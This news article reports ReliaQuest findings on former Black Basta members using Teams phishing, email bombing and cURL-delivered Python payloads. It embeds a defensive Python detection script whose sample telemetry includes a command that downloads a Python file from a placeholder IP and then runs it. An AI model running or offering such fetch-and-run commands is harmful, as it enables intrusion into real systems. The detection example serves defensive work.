Former members of the Black Basta ransomware group are back in action, this time using familiar tactics like Microsoft Teams phishing, email bombing, and newly added Python-based payloads to breach corporate networks.
According to a recent report by cybersecurity firm ReliaQuest, former Black Basta members have come together again to launch a wave of Microsoft Teams phishing attacks, combining them with email bombing and malicious scripting to gain long-term access to target systems.
These attacks, observed between February and May 2025, largely originated from compromised or spoofed onmicrosoft[.]com domains. Targets have included sectors such as finance, insurance, and construction, with attackers posing as help desk personnel to trick unsuspecting users into granting access.
The group has evolved beyond traditional social engineering by introducing malicious Python scripts, deployed via cURL requests. Once initial access is achieved through Microsoft Teams or email-based phishing, attackers reportedly initiate remote desktop sessions using tools like Quick Assist and AnyDesk. These sessions allow them to deploy advanced payloads, establish command-and-control (C2) communication, and maintain persistence.
ReliaQuest’s findings indicate that attackers are leveraging this access to download and run Java-based remote access trojans (RATs), updated versions of malware previously used in Black Basta campaigns. The malware now uses cloud services like Google Drive and OneDrive to proxy commands, making detection even more difficult.
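The chain described above (external Teams message from an onmicrosoft.com tenant, email bombing, a Quick Assist or AnyDesk session, then a cURL-fetched Python script being run) lends itself to sequence-based detection. The following is an added illustration, not code from ReliaQuest or the original report; the event schema, the one-hour window and the sample telemetry are all constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample host telemetry: (timestamp, host, kind, detail). Not real data.
EVENTS = [
    ("2025-03-04T09:00:00", "ws-17", "teams_external_msg", "helpdesk@contoso-it.onmicrosoft.com"),
    ("2025-03-04T09:02:10", "ws-17", "mail_burst", "312 messages in 10 min"),
    ("2025-03-04T09:14:40", "ws-17", "process", "quickassist.exe"),
    ("2025-03-04T09:20:05", "ws-17", "process", "curl.exe -o C:\\Users\\Public\\u.py http://203.0.113.10/u.py"),
    ("2025-03-04T09:20:30", "ws-17", "process", "python.exe C:\\Users\\Public\\u.py"),
    ("2025-03-04T11:00:00", "ws-22", "teams_external_msg", "partner@fabrikam.onmicrosoft.com"),
    ("2025-03-04T15:00:00", "ws-22", "process", "curl.exe https://example.org/index.html"),
]
REMOTE_TOOLS = ("quickassist.exe", "anydesk.exe")   # assumed process names
WINDOW = timedelta(hours=1)                         # assumed correlation window

def _stage(kind, detail):
    """Map one raw event to a named stage of the chain, or None if unrelated."""
    d = detail.lower()
    if kind == "teams_external_msg" and d.endswith(".onmicrosoft.com"):
        return "teams_lure"
    if kind == "mail_burst":
        return "email_bomb"
    if kind == "process" and d.startswith(REMOTE_TOOLS):
        return "remote_session"
    if kind == "process" and d.startswith("curl") and ".py" in d:
        return "py_fetch"
    if kind == "process" and d.startswith("python") and ".py" in d:
        return "py_exec"
    return None

def correlate(events, window=WINDOW):
    """Return {host: [stages]} for hosts where a Teams lure is followed, within
    `window`, by a remote-assistance session and a cURL-fetched .py being executed."""
    per_host, hits = {}, {}
    for ts, host, kind, detail in sorted(events):     # ISO timestamps sort lexically
        stage = _stage(kind, detail)
        if stage:
            per_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    required = {"teams_lure", "remote_session", "py_fetch", "py_exec"}
    for host, seq in per_host.items():
        for t0 in (t for t, s in seq if s == "teams_lure"):
            stages = [s for t, s in seq if t0 <= t <= t0 + window]
            if required <= set(stages):
                hits[host] = stages
    return hits

if __name__ == "__main__":
    print(correlate(EVENTS))   # ws-17 flagged with all five stages; ws-22 is not
```

The email-bombing stage is recorded but not required, since a lure can succeed without it; ws-22 shows a lone external Teams message does not fire the rule on its own.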
Black Basta was a notorious ransomware group that emerged in 2022, quickly becoming one of the most dangerous cybercrime operations by targeting hundreds of organizations with double-extortion tactics. It was formed by former members of the Conti and REvil gangs and relied on tools like QakBot and phishing campaigns, including Microsoft Teams lures, for initial access.
The group suffered a major blow in 2023 when law enforcement disrupted its infrastructure. In February 2025, a massive internal chat log leak exposed its operations, members, and internal disputes, effectively dismantling the group. While the Black Basta name has gone quiet, its former members are believed to have joined or formed other ransomware groups, keeping the threat alive under new banners.
ReliaQuest stressed the persistence and evolution of tactics used by former Black Basta affiliates, stating, “Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads.” The company noted that many of these Microsoft Teams phishing attacks originated from onmicrosoft[.]com domains or compromised legitimate domains, allowing the attackers to appear more authentic. ReliaQuest added, “The shutdown of Black Basta's data-leak site, despite the continued use of its tactics, indicates that former affiliates have likely either migrated to another RaaS group or formed a new one.” They emphasized that the most likely scenario is that these actors have joined the CACTUS ransomware group, supported by leaked internal chats referencing payments of “$500–600K to CACTUS.” The firm also warned about the growing use of Python scripts and Java-based malware in these campaigns, stating, “The use of Python scripts in this attack highlights an evolving tactic that's likely to become more prevalent in future Teams phishing campaigns in the immediate future.”
The resurgence of Black Basta-style tactics shows that ransomware groups may disband in name but continue operating under new identities, using the same or more advanced techniques. This persistence shows how threat actors evolve faster than traditional defenses, exploiting trusted tools like Microsoft Teams and cloud services to infiltrate organizations undetected.
Ransomware is a type of malicious software that encrypts a victim’s data or system, rendering it inaccessible until a ransom is paid.
Responses to a ransomware attack vary, but often include isolating affected systems, involving cybersecurity experts, reporting to authorities, and, ideally, not paying the ransom. Organizations may also review and strengthen their cybersecurity protocols.
Ransomware groups rebrand to avoid detection, escape law enforcement, or reset their reputations. Even after public exposure, the core members often continue operations using similar tactics under a different group identity.